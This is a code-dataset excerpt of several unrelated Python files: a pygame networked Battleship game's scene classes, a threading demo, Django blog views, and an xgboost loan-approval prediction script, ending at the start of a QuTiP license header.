int(self.port_box.get_text())\n self.scene_handler.switch(Scene.WAIT_CONNECT_MENU, self.screen, ip, port)\n #if wait_connect_menu(connection):\n # placement(settings, connection, square_group, reserved_squares)\n #else:\n # connection.interrupt_queue.put(True)\n\n def do_logic(self):\n pass\n\n def draw(self):\n self.screen.fill(color.GREY)\n self.draw_components()\n\nclass WaitConnectMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip, port):\n self.scene_handler = scene_handler\n self.settings = None\n self.ip = ip\n self.port = port\n center = screen.get_rect().center\n self.title = menu.Label(\"Awaiting response from server...\", font, color.BLACK, color.BLUE_GREY)\n self.title.rect.center = center\n self.title.rect.y = 150\n popup_offset_x = 100\n popup_offset_y = 100\n self.cancel_btn = menu.Button(\"Cancel\", font, color.BLACK, color.BLUE_GREY)\n self.cancel_btn.rect.center = center\n self.cancel_btn.rect.y = 400\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n menu.Menu.__init__(self, screen, [self.title], [self.cancel_btn], pop_rect, color.BLUE_GREY)\n # Create the connection\n self.connection = networking.client.Client()\n client_thread = self.connection.create(ip, port)\n client_thread.start()\n\n def do_logic(self):\n if self.connection.connected:\n self.scene_handler.switch(Scene.PLACEMENT, self.screen, settings, self.connection)\n \n if self.connection.check_closure() != None:\n print(\"Failed to connect!\")\n self.scene_handler.switch(Scene.CONNECT_MENU, self.screen, self.ip, self.port)\n\n def check_events(self):\n selected = self.check_menu_events()\n\n # Cancel button or escape is pressed\n if selected != None:\n # Stop the connection effort\n self.connection.close()\n self.scene_handler.switch(Scene.CONNECT_MENU, self.screen, self.ip, self.port)\n\n def draw(self):\n self.draw_components()\n\nclass Placement(Scene):\n def __init__(self, scene_handler, screen, settings, connection):\n self.scene_handler = scene_handler\n self.screen = screen\n self.connection = connection\n self.disconnect_menu = DisconnectMenu(screen)\n self.ready_msg_sent = False\n self.ready_msg_received = False\n # Create a game grid\n grid_offset_w = 50\n grid_offset_h = 50\n grid_width = SCREEN_WIDTH - 2 * grid_offset_w\n grid_height = SCREEN_HEIGHT - 2 * grid_offset_h\n self.grid = grid.Grid((grid_offset_w, grid_offset_h, grid_width, grid_height), settings.rows, settings.columns, 2, color.BLACK)\n # Create sprite groups \n self.square_group = self.grid.get_square_group(color.GREEN)\n self.reserved_squares = pygame.sprite.Group()\n self.colliding_squares = []\n # Create a sprite group for the ships\n self.unplaced_ships = pygame.sprite.LayeredUpdates()\n # Is normal sprite group enough?\n self.placed_ships = pygame.sprite.LayeredUpdates() \n self.square_size = self.grid.get_square_size_abs()\n # Normal sprite groups are not ordered, so this might return something else than the top left square\n self.start_square = self.grid.get_square((0,0))\n # Add every ship to the ships group\n grid_rect = self.grid.get_rect()\n for i in range(0, settings.carrier_count):\n carrier = ship.Ship(settings.carrier_size, self.square_size, grid_rect, self.square_group)\n carrier.move_to(self.start_square.rect.x, self.start_square.rect.y)\n self.unplaced_ships.add(carrier)\n for i in range(0, settings.battleship_count):\n battleship = ship.Ship(settings.battleship_size, self.square_size, grid_rect, self.square_group)\n 
battleship.move_to(self.start_square.rect.x, self.start_square.rect.y)\n            self.unplaced_ships.add(battleship)\n        for i in range(0, settings.cruiser_count):\n            cruiser = ship.Ship(settings.cruiser_size, self.square_size, grid_rect, self.square_group)\n            cruiser.move_to(self.start_square.rect.x, self.start_square.rect.y)\n            self.unplaced_ships.add(cruiser)\n        for i in range(0, settings.submarine_count):\n            submarine = ship.Ship(settings.submarine_size, self.square_size, grid_rect, self.square_group)\n            submarine.move_to(self.start_square.rect.x, self.start_square.rect.y)\n            self.unplaced_ships.add(submarine)\n        for i in range(0, settings.patrol_boat_count):\n            patrol_boat = ship.Ship(settings.patrol_boat_size, self.square_size, grid_rect, self.square_group)\n            patrol_boat.move_to(self.start_square.rect.x, self.start_square.rect.y)\n            self.unplaced_ships.add(patrol_boat)\n\n        self.awaiting_ship = self.unplaced_ships.get_sprite(0)\n        self.collides = self.check_collision()\n        self.ready = False\n\n    def check_events(self):\n        moved = False\n        # Check events\n        if self.disconnect_menu.visible:\n            selection = self.disconnect_menu.check_menu_events()\n            if selection == self.disconnect_menu.no_btn or selection == -1:\n                self.disconnect_menu.visible = False\n            elif selection == self.disconnect_menu.yes_btn:\n                self.connection.close()\n                self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n        else:\n            for event in pygame.event.get():\n                if event.type == pygame.KEYDOWN:\n                    if event.key == pygame.K_ESCAPE:\n                        self.disconnect_menu.visible = True\n                    if self.ready:\n                        # Return because all ships have been placed and we don't need to check movement keys anymore\n                        return\n                    elif event.key == pygame.K_d:\n                        print(\"Ship coords:\", self.awaiting_ship.rect.x, self.awaiting_ship.rect.y)\n                    elif event.key == pygame.K_r:\n                        self.awaiting_ship.rotate(self.grid.get_rect())\n                        moved = True\n                    elif event.key == pygame.K_UP:\n                        self.awaiting_ship.move_up()\n                        moved = True\n                    elif event.key == pygame.K_DOWN:\n                        self.awaiting_ship.move_down()\n                        moved = True\n                    elif event.key == pygame.K_RIGHT:\n                        self.awaiting_ship.move_right()\n                        moved = True\n                    elif event.key == pygame.K_LEFT:\n                        self.awaiting_ship.move_left()\n                        moved = True\n                    # Collisions are checked again if the ship has been moved\n                    if moved:\n                        self.collides = self.check_collision()\n                    elif event.key == pygame.K_RETURN:\n                        self.try_place()\n    \n    def check_collision(self):\n        self.colliding_squares = []\n        collides = False\n        # Find the ship's position and check if it's reserved\n        for square in self.awaiting_ship.get_squares():\n            current_colliding_squares = pygame.sprite.spritecollide(square, self.reserved_squares, False)\n            if len(current_colliding_squares) > 0:\n                self.colliding_squares.append(square)\n                collides = True\n        if collides:\n            return True\n        else:\n            return False\n    \n    def do_logic(self):\n        # Check if the connection was closed\n        controlled_closure = self.connection.check_closure()\n        if controlled_closure != None:\n            if controlled_closure:\n                msg = \"The connection was closed by the opponent.\"\n            else:\n                msg = \"The connection was closed unexpectedly.\"\n            self.scene_handler.switch(Scene.CONNECTION_CLOSED, self.screen, msg)\n\n        if self.ready_msg_sent == False and self.ready:\n            packet = Packet([1], Packet.T_READY)\n            self.connection.send_queue.put(packet)\n            self.ready_msg_sent = True\n\n        if self.ready_msg_received == False:\n            ready_packet = self.connection.get_packet(Packet.T_READY)\n            if ready_packet != None:\n                self.ready_msg_received = True\n\n        if self.ready_msg_sent and self.ready_msg_received:\n            
self.scene_handler.switch(Scene.CLASH, self.screen, settings, self.connection, self.placed_ships)\n \n def draw(self):\n # Draw (order is important)\n self.screen.fill(color.GREY)\n self.grid.draw(self.screen)\n# square_group.draw(screen)\n self.placed_ships.draw(self.screen)\n if not self.ready:\n self.awaiting_ship.draw(self.screen)\n pygame.draw.rect(self.screen, color.GREEN, self.awaiting_ship.rect, 2)\n # Draw a transparent surface on top of the colliding squares\n for s in self.colliding_squares:\n transparent_surf = pygame.Surface((s.rect.width, s.rect.height))\n transparent_surf.set_alpha(128)\n transparent_surf.fill(color.RED)\n self.screen.blit(transparent_surf, (s.rect.x, s.rect.y)) \n if self.disconnect_menu.visible:\n self.disconnect_menu.draw_components()\n # Status\n #screen.blit(status.surf, status.rect)\n\n def try_place(self):\n # If the position is not reserved, the ship is placed there\n if self.collides == False:\n # Add the ship to the group of placed ships\n self.placed_ships.add(self.awaiting_ship)\n # Reserve the squares\n self.reserved_squares.add(self.awaiting_ship.get_squares())\n # Remove the ship from awaiting ships\n self.unplaced_ships.remove(self.awaiting_ship)\n if len(self.unplaced_ships) > 0:\n self.awaiting_ship = self.unplaced_ships.get_sprite(0)\n self.collides = self.check_collision()\n else:\n # When all ships have been placed, set state to ready\n self.ready = True\n return True\n else:\n return False\n\nclass DisconnectMenu(Scene, menu.Menu):\n def __init__(self, screen):\n self.visible = False\n center = screen.get_rect().center\n self.title = menu.Label(\"Exit to main menu?\", font, color.BLACK, color.BLUE_GREY)\n self.title.rect.center = center\n self.title.rect.y = 250\n popup_offset_x = 200\n popup_offset_y = 200\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n self.yes_btn = menu.Button(\"Yes\", font, color.BLACK, color.BLUE_GREY)\n self.yes_btn.rect.center = pop_rect.center\n self.yes_btn.rect.y += 25\n self.no_btn = menu.Button(\"No\", font, color.BLACK, color.BLUE_GREY)\n self.no_btn.rect.center = pop_rect.center\n self.no_btn.rect.y += 100\n menu.Menu.__init__(self, screen, [self.title], [self.no_btn, self.yes_btn], pop_rect, color.BLUE_GREY)\n\nclass ConnectionClosedMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, message):\n self.scene_handler = scene_handler\n self.screen = screen\n center = screen.get_rect().center\n popup_offset_x = 200\n popup_offset_y = 200\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n title_rect = pygame.Rect(0, 0, pop_rect.w - 70, 62)\n self.title = menu.Label(message, font, color.BLACK, color.BLUE_GREY, title_rect)\n self.title.rect.center = center\n self.title.rect.y = 250\n self.ok_btn = menu.Button(\"OK\", font, color.BLACK, color.BLUE_GREY)\n self.ok_btn.rect.center = pop_rect.center\n self.ok_btn.rect.y += 25\n menu.Menu.__init__(self, screen, [self.title], [self.ok_btn], pop_rect, color.BLUE_GREY)\n\n def check_events(self):\n selection = self.check_menu_events()\n if selection == -1 or selection == self.ok_btn:\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n\n def do_logic(self):\n pass\n\n def draw(self):\n self.draw_components()\n\nclass Clash(Scene):\n def __init__(self, scene_handler, screen, settings, connection, placed_ships):\n self.scene_handler = scene_handler\n self.screen = screen\n self.settings = 
settings\n self.connection = connection\n self.disconnect_menu = DisconnectMenu(screen)\n # Create the grids\n offset_x = 50\n offset_y = 50\n width = (SCREEN_WIDTH - 3 * offset_x) / 2\n #height = SCREEN_HEIGHT - 2 * offset_y\n height = SCREEN_HEIGHT / 2\n self.my_grid = grid.Grid((offset_x, offset_y, width, height), settings.rows, settings.columns, 2, color.BLACK)\n enemy_offset_x = offset_x + width + offset_x\n self.enemy_grid = grid.Grid((enemy_offset_x, offset_y, width, height), settings.rows, settings.columns, 2, color.BLACK)\n self.square_size = self.my_grid.get_square_size_abs()\n self.my_squares = self.my_grid.get_square_group(color.GREEN)\n self.enemy_squares = self.enemy_grid.get_square_group(color.GREEN)\n start_square = self.enemy_squares.sprites()[0]\n # Create spritegroups for the ships and strikes\n self.my_ships = placed_ships\n self.my_strikes = pygame.sprite.Group()\n self.my_hits = pygame.sprite.Group()\n self.my_misses = pygame.sprite.Group()\n self.enemy_strikes = pygame.sprite.Group()\n self.enemy_hits = pygame.sprite.Group()\n self.enemy_misses = pygame.sprite.Group()\n # Create a crosshair\n self.crosshair = Crosshair(self.square_size, self.enemy_grid.get_rect(), self.enemy_squares)\n # Transform the placed ships to the new grid\n for ship in self.my_ships:\n ship.transform(self.square_size, self.my_squares)\n # Decide who goes first\n self.your_turn = False\n going_first = 0\n is_host = isinstance(self.connection, networking.server.Server)\n if is_host:\n going_first = random.randint(0, 1)\n if going_first == 0:\n self.your_turn = True\n else:\n go_first_packet = Packet([1], Packet.T_YOUR_TURN)\n self.connection.send_queue.put(go_first_packet)\n\n # Create status labels\n self.left_status = menu.Label(\"\", font, color.RED, color.GREY)\n self.left_status.rect.centerx = self.my_grid.get_rect().centerx\n self.left_status.rect.y = 420\n self.right_status = menu.Label(\"\", font, color.RED, color.GREY)\n self.right_status.rect.centerx = self.enemy_grid.get_rect().centerx\n self.right_status.rect.y = 420\n\n def check_events(self):\n if self.disconnect_menu.visible:\n selection = self.disconnect_menu.check_menu_events()\n if selection == self.disconnect_menu.no_btn or selection == -1:\n self.disconnect_menu.visible = False\n elif selection == self.disconnect_menu.yes_btn:\n self.connection.close()\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n else:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.disconnect_menu.visible = True\n if self.your_turn:\n if event.key == pygame.K_UP:\n self.crosshair.move_up()\n elif event.key == pygame.K_DOWN:\n self.crosshair.move_down()\n elif event.key == pygame.K_RIGHT:\n self.crosshair.move_right()\n elif event.key == pygame.K_LEFT:\n self.crosshair.move_left()\n elif event.key == pygame.K_RETURN:\n if self.try_strike():\n target_square = self.crosshair.get_squares().sprites()[0]\n self.my_strikes.add(target_square)\n strike_pos = target_square.pos\n # Send the strike coordinates to opponent\n strike_packet = Packet(strike_pos, Packet.T_STRIKE)\n self.connection.send_queue.put(strike_packet)\n self.your_turn = False\n\n def try_strike(self):\n \"\"\"\n Try to strike a square on the grid.\n\n :return: True if the strike was done, False if the position had already been struck\n :rtype: bool\n \"\"\"\n target_square = self.crosshair.get_squares().sprites()[0]\n already_struck = False\n for square in self.my_strikes:\n if square == target_square:\n already_struck = 
True\n break\n\n if already_struck:\n return False\n else:\n return True\n\n def get_square_in_coordinates(self, square_group, position):\n position = tuple(position)\n for square in square_group:\n if square.pos == position:\n return square\n\n def evaluate_enemy_strike(self, strike_pos):\n \"\"\"\n Check whether the enemy strike hit any of our ships.\n\n :param tuple strike_pos: the position where the enemy strike hit in grid coordinates (x, y)\n :return: 1 if the strike hit our ship, 0 if the strike missed\n :rtype: int\n \"\"\"\n hit = False\n target_square = self.get_square_in_coordinates(self.my_squares, strike_pos)\n for ship in self.my_ships:\n for square in ship.get_squares():\n if square.pos == strike_pos:\n hit = True\n \n if hit:\n hitmarker = Hitmarker(self.square_size, self.my_grid.get_rect(), self.my_squares)\n hitmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.enemy_hits.add(hitmarker)\n self.left_status.text = \"A hit!\"\n return 1\n else:\n missmarker = Missmarker(self.square_size, self.my_grid.get_rect(), self.my_squares)\n missmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.enemy_misses.add(missmarker)\n self.left_status.text = \"A miss!\"\n return 0\n\n def check_strike_result(self, data):\n \"\"\"\n Check the result of our own strike given by the opponent. \n Add a hitmarker or missmarker on the enemy grid depending on the result.\n\n :param list data: data of the result packet\n \"\"\"\n result = data[0]\n strike_pos = [data[1], data[2]]\n target_square = self.get_square_in_coordinates(self.enemy_squares, strike_pos)\n if result == 1:\n hitmarker = Hitmarker(self.square_size, self.enemy_grid.get_rect(), self.enemy_squares)\n hitmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.my_hits.add(hitmarker)\n self.right_status.text = \"A hit!\"\n else:\n missmarker = Missmarker(self.square_size, self.enemy_grid.get_rect(), self.enemy_squares)\n missmarker.move_to(target_square.rect.x, target_square.rect.y)\n self.my_misses.add(missmarker)\n self.right_status.text = \"A miss!\"\n\n def do_logic(self):\n # Check if the connection was closed\n controlled_closure = self.connection.check_closure()\n if controlled_closure != None:\n if controlled_closure:\n msg = \"The connection was closed by the opponent.\"\n else:\n msg = \"The connection was closed unexpectedly.\"\n self.scene_handler.switch(Scene.CONNECTION_CLOSED, self.screen, msg)\n \n turn_packet = self.connection.get_packet(Packet.T_YOUR_TURN)\n if turn_packet != None:\n self.your_turn = True\n\n # Enemy strike\n enemy_strike_packet = self.connection.get_packet(Packet.T_STRIKE)\n if enemy_strike_packet != None:\n strike_pos = enemy_strike_packet.get_data(include_header=False)\n result = self.evaluate_enemy_strike(tuple(strike_pos))\n data = [result, strike_pos[0], strike_pos[1]]\n enemy_result_packet = Packet(data, Packet.T_STRIKE_RESULT)\n self.connection.send_queue.put(enemy_result_packet)\n # Check if our fleet has been destroyed\n if len(self.enemy_hits) == self.settings.total_reserved_squares:\n # Send game over message\n game_over = Packet([1], Packet.T_GAME_OVER)\n self.connection.send_queue.put(game_over)\n # Hide the disconnect menu if it's open\n self.disconnect_menu.visible = False\n self.draw()\n self.scene_handler.switch(Scene.END, self.screen, self.settings, self.connection)\n else:\n self.your_turn = True\n\n # Result of own strike\n result_packet = self.connection.get_packet(Packet.T_STRIKE_RESULT)\n if result_packet != None:\n data = 
result_packet.get_data(include_header=False)\n self.check_strike_result(data)\n\n game_over_packet = self.connection.get_packet(Packet.T_GAME_OVER)\n if game_over_packet != None:\n self.draw()\n print(\"Victory!\")\n self.scene_handler.switch(Scene.END, self.screen, self.settings, self.connection)\n\n def draw(self):\n self.screen.fill(color.GREY)\n self.my_grid.draw(self.screen)\n self.enemy_grid.draw(self.screen)\n #self.enemy_squares.draw(self.screen)\n self.my_ships.draw(self.screen)\n if len(self.enemy_strikes) > 0:\n self.enemy_strikes.draw(self.screen)\n if self.your_turn:\n self.crosshair.draw(self.screen)\n for s in self.my_ships:\n pygame.draw.rect(self.screen, color.RED, s.rect, 1)\n self.my_hits.draw(self.screen)\n self.my_misses.draw(self.screen)\n self.enemy_hits.draw(self.screen)\n self.enemy_misses.draw(self.screen)\n self.left_status.draw(self.screen)\n self.right_status.draw(self.screen)\n if self.disconnect_menu.visible:\n self.disconnect_menu.draw_components()\n\nclass End(Scene):\n class EndMenu(menu.Menu):\n def __init__(self, screen):\n popup_offset_x = 500\n popup_offset_y = 450\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, 300, 200)\n center = pop_rect.center\n self.play_again_btn = menu.Button(\"Play again\", font)\n self.play_again_btn.rect.center = center\n self.play_again_btn.rect.y -= 50\n self.exit_btn = menu.Button(\"Exit to menu\", font)\n self.exit_btn.rect.center = center\n self.exit_btn.rect.y += 50\n menu.Menu.__init__(self, screen, [], [self.play_again_btn, self.exit_btn], pop_rect, color.BLUE_GREY)\n\n def __init__(self, scene_handler, screen, settings, connection):\n self.scene_handler = scene_handler\n self.screen = screen\n self.settings = settings\n self.connection = connection\n self.menu = self.EndMenu(screen)\n\n def check_events(self):\n selection = self.menu.check_menu_events()\n if selection == -1:\n exit()\n\n if selection == self.menu.exit_btn:\n self.connection.close()\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n \n def do_logic(self):\n controlled_closure = self.connection.check_closure()\n if controlled_closure != None:\n if controlled_closure:\n msg = \"The connection was closed by the opponent.\"\n else:\n msg = \"The connection was closed unexpectedly.\"\n print(msg)\n\n def draw(self):\n self.menu.draw_components()\n pass\n","sub_path":"scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":33967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"285629199","text":"import time\nimport threading\n\ndef draw_circle(cost):\n\tprint(\"start draw a circle \", time.ctime())\n\ttime.sleep(cost)\n\tprint(\"draw a circle \", time.ctime())\n\ndef draw_square(cost):\n\tprint(\"start draw a square \", time.ctime())\n\ttime.sleep(cost)\n\tprint(\"draw a square \", time.ctime())\n\ndef multi_thread():\n\tdraw_circle_thread = threading.Thread(target=draw_circle, args=(1,))\n\tdraw_square_thread = threading.Thread(target=draw_square, args=(2,))\n\tdraw_circle_thread.start()\n\tdraw_square_thread.start()\n\tdraw_circle_thread.join()\n\tdraw_square_thread.join()\n\nif __name__ == '__main__':\n\tprint(\"start \", time.ctime())\n\tmulti_thread()\n\tprint(\"end \", time.ctime())\n","sub_path":"2020/06/01/python/python线程/multi_thread.py","file_name":"multi_thread.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"207104666","text":"# dojo/view.py\nfrom 
django.contrib import messages\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom .models import Post\nfrom .forms import PostForm\nfrom .models import Comment\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef post_list(request):\n    qs = Post.objects.all().prefetch_related('tag_set','comment_set') \n    \n    q = request.GET.get('q','')\n    if q:\n        qs = qs.filter(title__icontains = q)\n    \n    return render(request, 'blog/post_list.html',{'post_list': qs, 'q':q })\n\ndef post_detail(request, id):\n    #try:\n    #    post = Post.objects.get(id=id)\n    #except Post.DoesNotExist:\n    #    raise Http404\n    post = get_object_or_404(Post,id=id) # the four commented-out lines above in a single line!\n    return render(request, 'blog/post_detail.html', {'post': post})\n\ndef post_new(request):\n    if request.method =='POST':\n        form = PostForm(request.POST, request.FILES)\n        if form.is_valid():\n            post = form.save() \n            messages.success(request, 'Saved a new post.')\n            return redirect(post) # post.get_absolute_url is already implemented on the model --> goes to post_detail\n        \n    else:\n        form = PostForm()\n    return render(request, 'blog/post_form.html', {'form': form})\n\ndef post_edit(request, id):\n    post = get_object_or_404(Post, id=id)\n    if request.method =='POST':\n        form = PostForm(request.POST, request.FILES, instance=post)\n        if form.is_valid():\n            post = form.save()\n            messages.success(request, 'Updated the post.') \n            return redirect(post) # post.get_absolute_url is already implemented on the model --> goes to post_detail\n        \n    else:\n        form = PostForm(instance=post)\n    return render(request, 'blog/post_form.html', {'form': form})\n\ndef comment_list(request):\n    comment_list = Comment.objects.all().select_related('post')\n    \n    return render(request, 'blog/comment_list.html', {\n        'comment_list' : comment_list,\n})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"106916593","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 20 18:09:53 2018\n\n@author: Hubert\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\n\nfrom sklearn import model_selection\nfrom sklearn.ensemble import VotingClassifier\n\nimport datetime\n\ndef addCities(df):\n    cityCode = [\"C10001\", \"C10002\", \"C10003\", \"C10006\",\"C10004\", \n                \"C10005\", \"C10007\", \"C10010\", \"C10008\", \"C10009\"]\n    \n    for city in cityCode:\n        df[city] = (df['City_Code']== city)\n    return df\n\ndef addSource(df):\n    sourceCode = [\"S122\", \"S133\", \"S143\", \"S134\", \"S159\"]\n    \n    for source in sourceCode:\n        df[source] = (df[\"Source\"]== source)\n    return df\n\ndef addBank(df):\n    bankCode = [\"B001\", \"B002\", \"B003\", \"B004\", \"B005\", \"B006\", \"B011\"]\n    \n    for bank in bankCode:\n        df[bank] = (df[\"Customer_Existing_Primary_Bank_Code\"]== bank)\n    return df\n\ndef addMoneyFeature(df):\n    df[\"monthlyIncomeRatio\"] = df[\"Monthly_Income\"]/df[\"Loan_Amount\"] \n    \n    return df\n\ndef addEMIFeature(df):\n    #df[\"biggerEMI\"] = (df[\"Existing_EMI\"] <= df[\"EMI\"]) \n\n    return df\n\ndef trainXGModel(train):\n    target = train['Approved']\n    train['Approved'] = train['Approved'].astype('category')\n    \n    train = train.drop(['Approved', 'ID'], axis=1) \n    \n    currentTime = datetime.datetime.now().isoformat()\n    print(\"Train time begin:\", currentTime)\n    print(\"For model\", train)\n    xgModel = xgb.XGBClassifier(learning_rate = 0.3, n_estimators=20).fit(train, target)\n    finishTime = datetime.datetime.now().isoformat()\n    
print(\"Train time finish:\", finishTime)\n return xgModel\n\ndef predictXGModel(XGModel, test):\n testID = test['ID'] \n test = test.drop(['ID'], axis = 1)\n \n predictions = XGModel.predict(test)\n\n \n results = pd.DataFrame()\n results['ID'] = testID\n results['Approved'] = predictions\n\n return results\n\ndef lastResults(test):\n results = pd.DataFrame()\n results['ID'] = test['ID']\n results['Approved'] = 0\n \n return results\n\ndef lastResults2(test):\n results = pd.DataFrame()\n results['ID'] = test['ID']\n results['Approved'] = 1\n \n return results\n \n'''\ntrainSubset1 = pd.read_csv(\"../data/trainSubset1.csv\")\ntrainSubset1a = pd.read_csv(\"../data/trainSubset1a.csv\")\ntrainSubset2 = pd.read_csv(\"../data/trainSubset2.csv\")\ntrainSubset3 = pd.read_csv(\"../data/trainSubset3.csv\")\ntrainSubset4 = pd.read_csv(\"../data/trainSubset4.csv\")\n\n\ntestSubset1 = pd.read_csv(\"../data/testSubset1.csv\")\ntestSubset1a = pd.read_csv(\"../data/testSubset1a.csv\")\ntestSubset2 = pd.read_csv(\"../data/testSubset2.csv\")\ntestSubset3 = pd.read_csv(\"../data/testSubset3.csv\")\ntestSubset4 = pd.read_csv(\"../data/testSubset4.csv\")\n'''\n#dataFrameSet = [trainSubset1, trainSubset1a, trainSubset2, trainSubset3, trainSubset4,\n# testSubset1, testSubset1a, testSubset2, testSubset3, testSubset4]\n\ntrainDF = pd.read_csv(\"../data/train.csv\")\ntest= pd.read_csv(\"../data/test.csv\")\n\nfor col in ['Employer_Category2', 'Var1']:\n test[col] = test[col].astype('category')\n trainDF[col] = trainDF[col].astype('category')\ncols_to_transform = ['Gender', 'City_Category', 'Employer_Category1', 'LeadCreationDOW',\n 'Employer_Category2', 'Source_Category', 'Var1', 'Primary_Bank_Type', 'Contacted'] \n \ntest = pd.get_dummies(test, columns = cols_to_transform)\ntrainDF = pd.get_dummies(trainDF, columns = cols_to_transform)\n\ntrainDF = addCities(trainDF)\ntrainDF = addSource(trainDF)\ntrainDF = addBank(trainDF)\ntest = addCities(test)\ntest = addSource(test)\ntest = addBank(test)\n\ntrainApprove = trainDF[trainDF[\"Approved\"] == 1]\nnrow = trainApprove.shape[0]\ntrainNill = trainDF[trainDF[\"Approved\"] == 0]\ntrainNotApprove = trainNill.sample(nrow - 204)\n\ntrain = pd.DataFrame()\ntrain = train.append(trainApprove)\ntrain = train.append(trainNotApprove)\n\n\ntrain = train.drop(['City_Code', 'Source', 'Customer_Existing_Primary_Bank_Code'], axis = 1)\ntest = test.drop(['City_Code', 'Source', 'Customer_Existing_Primary_Bank_Code'], axis = 1)\n\n\n\ntrainCols = train.columns.tolist()\ntestCols = test.columns.tolist()\n\ntrainCols.remove(\"Approved\")\ntest.columns = trainCols\n\n\ntrainSubset1 = train[train['Interest_Rate'].isnull() == 0]\ntrainSubset1a = train[(train['Existing_EMI'].isnull() == 0) & (train['Interest_Rate'].isnull() == 0)]\nremoveMissingEEMI = train[train['Existing_EMI'].isnull() == 0]\ntrainSubset2 = removeMissingEEMI[removeMissingEEMI['Loan_Amount'].isnull() == 0]\ntrainSubset3 = removeMissingEEMI\ntrainSubset4 = train[train['Interest_Rate'].isnull() & train['Existing_EMI'].isnull()]\n\ntestSubset1 = test[(test['Interest_Rate'].isnull() == 0) & (test['Existing_EMI'].isnull() == 1)] #Set so we don't need to use Existing EMI column to predict\ntestSubset1a = test[test['Interest_Rate'].isnull() == 0] #Set we can use EMI to predict\nremoveMissingEEMI = test[test['Existing_EMI'].isnull() == 0]\ntestSubset2 = removeMissingEEMI[removeMissingEEMI['Loan_Amount'].isnull() == 0 & removeMissingEEMI['Interest_Rate'].isnull()] \ntestSubset3 = 
removeMissingEEMI[removeMissingEEMI['Loan_Amount'].isnull()]\ntestSubset4 = test[test['Interest_Rate'].isnull() & test['Existing_EMI'].isnull()] #All Values here are zero\n\nfor sets in [trainSubset1, trainSubset1a, trainSubset2, testSubset1, testSubset1a, testSubset2]:\n sets = addMoneyFeature(sets)\n\nfor sets in [trainSubset1, trainSubset1a, testSubset1, testSubset1a]:\n sets = addEMIFeature(sets)\n\ntrainSubset1m = trainSubset1.drop('Existing_EMI', axis = 1)\nxgModel1 = trainXGModel(trainSubset1m)\nxgModel1a = trainXGModel(trainSubset1a)\n\n#trainSubset2 = trainSubset2.drop(['Interest_Rate', 'EMI'], axis = 1)\nxgModel2 = trainXGModel(trainSubset2)\n\ntrainSubset3 = trainSubset3.drop(['Interest_Rate', 'EMI', 'Loan_Amount', 'Loan_Period'], axis = 1)\nxgModel3 = trainXGModel(trainSubset3)\n\ntestSubset1m = testSubset1.drop('Existing_EMI', axis = 1)\nresults1 = predictXGModel(xgModel1, testSubset1m)\n\ntestSubset1b = testSubset1a.drop('Existing_EMI', axis = 1)\nresults1c = predictXGModel(xgModel1a, testSubset1a)\nresults1b = predictXGModel(xgModel1, testSubset1b)\n\nresults1a = pd.DataFrame()\nresults1a[\"Approved\"] = results1c[\"Approved\"] * 0.6 + results1b[\"Approved\"] * 0.4\nresults1a[\"ID\"] = results1b[\"ID\"]\n\n#testSubset2 = testSubset2.drop(['Interest_Rate', 'EMI'], axis = 1)\nresults2 = predictXGModel(xgModel2, testSubset2)\n\n\ntestSubset3 = testSubset3.drop(['Interest_Rate', 'EMI', 'Loan_Amount', 'Loan_Period'], axis = 1)\nresults3 = predictXGModel(xgModel3, testSubset3)\nresults4 = lastResults(testSubset4)\n\n\nresults = pd.DataFrame()\nresults = results.append(results1)\nresults = results.append(results1a)\nresults = results.append(results2)\nresults = results.append(results3)\nresults = results.append(results4)\n\n\nresults.to_csv(\"../results/newFeatures.csv\", index = False)\n","sub_path":"code/modelPrediction.py","file_name":"modelPrediction.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476890962","text":"# This file is part of QuTiP: Quantum Toolbox in Python.\n#\n# Copyright (c) 2011 and later, Paul D. Nation and Robert J. Johansson.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the QuTiP: Quantum Toolbox in Python nor the names\n# of its contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# 